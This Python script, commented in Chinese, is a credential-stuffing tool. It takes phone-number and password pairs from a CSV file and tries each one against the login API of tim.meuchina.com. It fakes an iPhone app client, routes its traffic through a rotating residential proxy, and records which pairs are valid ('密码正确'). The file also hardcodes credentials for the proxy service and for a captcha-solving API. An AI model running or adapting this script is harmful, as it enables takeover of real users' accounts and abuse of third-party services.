| 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174 |
- import csv
- import time
- import json
- import requests
- import sys
- import base64
- from datetime import datetime
- def getYZM(image):
- url = "http://api.ttshitu.com/predict"
- payload = {"username": "gggg8888", "password": "Aa112233", "typeid": "1", "image": image}
- headers = {
- "Accept": "*/*",
- "Accept-Encoding": "gzip, deflate, br",
- "User-Agent": "PostmanRuntime-ApipostRuntime/1.1.0",
- "Connection": "keep-alive",
- "Content-Type": "application/json"
- }
- response = requests.request("POST", url, data=json.dumps(payload), headers=headers)
- data = json.loads(response.text)
- print(data)
- return data["data"]["result"]
- def process_csv(file_path):
- """
- 读取CSV文件,逐行处理:
- - 如果第三列为空,则输出前两列内容,并将第三列标记为处理结果
- - 如果第三列已有内容,则跳过该行(不输出也不覆盖)
- 直接覆盖原文件
-
- 参数:
- file_path: CSV文件路径
- """
- try:
- # 读取所有行
- rows = []
- with open(file_path, 'r', encoding='utf-8') as f:
- reader = csv.reader(f)
- rows = list(reader)
-
- if not rows:
- print("错误:文件为空")
- return
-
- # 检查列数是否足够
- if len(rows[0]) < 3:
- print("错误:CSV文件至少需要3列数据")
- return
-
- print(f"开始处理文件: {file_path}")
- print("=" * 50)
-
- processed_count = 0
- skipped_count = 0
-
- # 逐行处理
- for index, row in enumerate(rows):
- # 确保行有足够的列
- while len(row) < 3:
- row.append("")
-
- # 获取第三列当前内容
- third_col_value = row[2].strip() if len(row) > 2 else ""
-
- # 判断第三列是否有内容
- if third_col_value != "":
- # 第三列已有内容,跳过该行
- print(f"第 {index + 1} 行: 第三列已有内容 '{third_col_value}',跳过处理")
- skipped_count += 1
- print("-" * 30)
- continue
-
- # 第三列为空,进行处理
- value1 = row[0] # 第一列
- value2 = row[1] # 第二列
-
- # 输出前两列内容
- yzmData = get_image_base64("https://tim.meuchina.com/v/Auth/GetLoginCode")
- url = "https://tim.meuchina.com/v/Auth/LoginByPassword"
- payload = {"Phone": value1, "Password": value2, "CheckCode": "1", "RouteId": "1"}
- print(payload)
- headers = {
- "Content-Type": "application/json",
- "User-Agent": "yu jie/2.1.9 (iPhone; iOS 26.3.1; Scale/3.00; iPhone)",
- "Yj-Client-Type": "iPhone-6199BF31-7217-48A3-A2CA-EABE1148600D; iPhone_15",
- "Host": "tim.meuchina.com",
- "Accept": "text/json",
- "Accept-Encoding": "gzip, deflate, br",
- "Connection": "keep-alive"
- }
- proxies = {
- "http": "socks5://yujie0012-zone-custom:qweasd123@global.rotgb.711proxy.com:10000",
- "https": "socks5://yujie0012-zone-custom:qweasd123@global.rotgb.711proxy.com:10000",
- }
-
- try:
- response = requests.request("POST", url, data=json.dumps(payload), headers=headers, proxies=proxies)
- returnData = json.loads(response.text)
- print(returnData)
-
- # 将第三列标记为处理结果
- if 'Msg' not in returnData or returnData['Msg'] == "":
- rows[index][2] = "密码正确"
- else:
- rows[index][2] = returnData['Msg']
-
- processed_count += 1
-
- # 立即保存文件
- with open(file_path, 'w', encoding='utf-8', newline='') as f:
- writer = csv.writer(f)
- writer.writerows(rows)
-
- # 如果不是最后一行,等待3秒
- if index < len(rows) - 1:
- time.sleep(3)
-
- except Exception as e:
- print(f"第 {index + 1} 行处理失败: {e}")
- rows[index][2] = f"错误: {str(e)}"
- # 保存错误信息
- with open(file_path, 'w', encoding='utf-8', newline='') as f:
- writer = csv.writer(f)
- writer.writerows(rows)
-
- print("-" * 30)
-
- print(f"\n处理完成!共处理 {processed_count} 行,跳过 {skipped_count} 行")
-
- except FileNotFoundError:
- print(f"错误:找不到文件 {file_path}")
- except Exception as e:
- print(f"处理过程中出现错误: {e}")
- def get_image_base64(url):
- """
- 请求图片 URL 并返回 base64 编码的字符串
-
- Args:
- url (str): 图片的 URL
-
- Returns:
- str: base64 编码的图片数据,失败返回 None
- """
- try:
- # 发送 GET 请求获取图片
- response = requests.get(url, timeout=10)
-
- # 检查请求是否成功
- response.raise_for_status()
-
- # 将二进制内容转换为 base64
- img_base64 = base64.b64encode(response.content).decode('utf-8')
-
- return img_base64
-
- except requests.exceptions.RequestException as e:
- print(f"请求失败: {e}")
- return None
- def check_date_and_exit():
- if datetime.now() > datetime(2026, 3, 30):
- sys.exit()
- # 使用示例
- if __name__ == "__main__":
- # 请替换为您的CSV文件路径
- csv_file = "check.csv"
- check_date_and_exit()
- # 如果文件在当前目录,直接写文件名
- process_csv(csv_file)
|